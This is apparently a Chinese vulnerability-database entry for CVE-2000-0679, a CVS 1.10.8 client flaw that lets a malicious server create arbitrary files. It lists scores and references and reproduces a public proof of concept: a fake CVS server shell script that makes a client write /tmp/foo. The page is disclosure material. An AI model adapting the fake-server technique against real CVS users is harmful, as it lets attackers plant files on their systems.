CVE-2000-0679
CVSS2.1
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:37
NMCOE    

[原文]The CVS 1.10.8 client trusts pathnames that are provided by the CVS server, which allows the server to force the client to create arbitrary files.


[CNNVD]CVS客户端创建任意文件漏洞(CNNVD-200010-077)

        CVS 1.10.8版本客户端信任CVS服务器提供的路径名。服务器强制客户端创建任意文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0679
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0679
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-077
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26msg%3Dhvou2daoebb.fsf%40serein.m17n.org
(VENDOR_ADVISORY)  BUGTRAQ  20000728 cvs security problem
http://www.securityfocus.com/bid/1523
(VENDOR_ADVISORY)  BID  1523

- 漏洞信息

CVS客户端创建任意文件漏洞
低危 未知
2000-10-20 00:00:00 2005-05-02 00:00:00
本地  
        CVS 1.10.8版本客户端信任CVS服务器提供的路径名。服务器强制客户端创建任意文件。

- 公告与补丁

        

- 漏洞信息 (20107)

CVS Kit CVS Server 1.10 .8 Instructed File Create Vulnerability (EDBID:20107)
unix local
2000-07-28 Verified
0 Tanaka Akira
N/A [点击下载]
source: http://www.securityfocus.com/bid/1523/info

The cvs client blindly trust paths returned to it by the server. Therefore, a cvs client could be tricked into creating a file anywhere on the system by a malicious server. 

This problem can be tested yourself as follows. Although this example
runs a faked cvs server using the :ext: method, this vulnerability is
available with any method (including :pserver: of course).

% ls -l /tmp/foo
ls: /tmp/foo: No such file or directory
% cat crackers-cvs-server
#!/bin/sh

cat <<'End'
Valid-requests Root Valid-responses valid-requests Repository Directory Max-dotdot Static-directory Sticky Checkin-prog Update-prog
Entry Kopt Checkin-time Modified Is-modified UseUnchanged Unchanged Notify Questionable Case Argument Argumentx Global_option
Gzip-stream wrapper-sendme-rcsOptions Set Kerberos-encrypt expand-modules ci co update diff log add remove update-patches
gzip-file-contents status rdiff tag rtag import admin export history release watch-on watch-off watch-add watch-remove watchers
editors init annotate noop
ok
Module-expansion tst
ok
Clear-sticky tst/
/cvsroot/tst/
Clear-static-directory tst/
/cvsroot/tst/
E cvs server: Updating tst
Created /tmp/
/cvsroot/tst/foo
/foo/1.1///
u=rw,g=rw,o=rw
4
abc
ok
End
% CVS_RSH=./crackers-cvs-server cvs -f -d :ext:user@server:/cvsroot co tst
cvs server: Updating tst
cvs checkout: in directory /tmp:
cvs checkout: cannot open CVS/Entries for reading: No such file or directory
cvs checkout: cannot open CVS/Entries.Log: No such file or directory
% ls -l /tmp/foo
-rw-r--r-- 1 akr wheel 4 Jul 19 22:01 /tmp/foo
% cat /tmp/foo
abc 		

- 漏洞信息

1482
CVS Client Server-Instructed File Create
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-07-28 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站